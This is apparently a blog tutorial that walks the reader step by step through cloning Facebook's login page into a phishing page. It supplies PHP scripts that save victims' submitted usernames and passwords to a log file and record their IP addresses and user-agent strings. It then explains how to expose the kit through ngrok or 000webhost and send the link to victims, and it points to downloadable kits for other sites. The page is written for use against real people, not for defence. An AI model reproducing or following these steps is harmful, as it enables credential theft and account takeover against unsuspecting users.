How to create phishing page and how to host complete guide

How to create a phishing page – Welcome to another article, Recently I have post lots of articles about creating a phishing page. Although the principle behind each guide is a smiler. In this post, I will explain all the necessary steps to create a phishing page. So this guide will help you to make your own phishing page at any site.

What is phishing?

Phishing is when someone tries to get access to your Facebook account by sending you a suspicious message or link that asks for your personal information. If they get into your account, they may use your account to send spam.

Requirement’s

• Any Device
• Chrome Browser

Feature’s

• Get username and password
• Get User-Agent information
• Get OTP

How to create a phishing page

Step 1: Download HTML index page of Target

First, you choose your target web page. Once you selected your target go to that web page like I choose Facebook

Once you enter your target website click right said mouse button and click the ” View page source “ option

Once you click the ” View page source ” Option open a new window that will be like the below image.

Now press “Ctrl+A” to Copy all page source information and past new Note pad

Now press the “Ctrl+F” Option to open the find bar then type “Action=” to find the bar see this below image

Now Remove “/login/privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEwNzY3NTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D” This command and type ” login.php” once you change this save that note pad name of “login.html”

Step 2: Creating Php file For Password Harvesting

Now we need to create a PHP file to harvesting the username and password so copy this below code and past your note pad name of “login.php”

 <?php

header (‘Location: facebook.com’);

$handle = fopen(“log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “rn”);

}

fwrite($handle, “rnnnn”);

fclose($handle);

exit;

?>

If you need to create any other website phishing page you need to change one small thing to the ” login.php” file that is replacing “facebook.com” in header value and type which website to you make without “Https or HTTP” and “www”

Step 3: Create a PHP file to get user-agent information

Now we need to create another PHP file to capture victim “user-agent” information so you copy this below all command and past your note pad and save it with the name of “ip.php”

<?php

if (!empty($_SERVER[‘HTTP_CLIENT_IP’]))

    {

      $ipaddress = $_SERVER[‘HTTP_CLIENT_IP’].”rn”;

    }

elseif (!empty($_SERVER[‘HTTP_X_FORWARDED_FOR’]))

    {

      $ipaddress = $_SERVER[‘HTTP_X_FORWARDED_FOR’].”rn”;

    }

else

    {

      $ipaddress = $_SERVER[‘REMOTE_ADDR’].”rn”;

    }

$useragent = ” User-Agent: “;

$browser = $_SERVER[‘HTTP_USER_AGENT’];

$file = ‘ip.txt’;

$victim = “IP: “;

$fp = fopen($file, ‘a’);

fwrite($fp, $victim);

fwrite($fp, $ipaddress);

fwrite($fp, $useragent);

fwrite($fp, $browser);

fclose($fp);

Step 3: Connect all files into one file

Once you complete the above step’s you have 3 files now connect all three files into one file so copy this below command and past your notepad with the name of “index.php”

 <?php

include ‘ip.php’;

header(‘Location: login.html’);

exit

?>

Step 4: Host phishing page

More way’s are there to hosting phishing pages but now we discussed two methods the first method is to host your Linux or termux with ngrok

First you open terminal inside the phishing page’s and type this below command

php -S localhost:4444

Now minimized terminal and start your ngrok with the port of ” 4444 ”

Now share this ngrok link to your victim

Step 5: Victim View

Once your victim click the Ngrok link that link will show this below image

If your victim type any data on this page

That all information saved into your system see this below image.

Now you can create any website to phishing page but with this hosting method, you will wait without closing your terminal until your victim clicks your phishing link But if you host all phishing files in 000webhost you don’t wait.

If you don’t know how to host a phishing page in 000webhost  please Read the below article.

How to host a phishing page with 000webhost

All website phishing pages download link

Password: www.errorsfind.com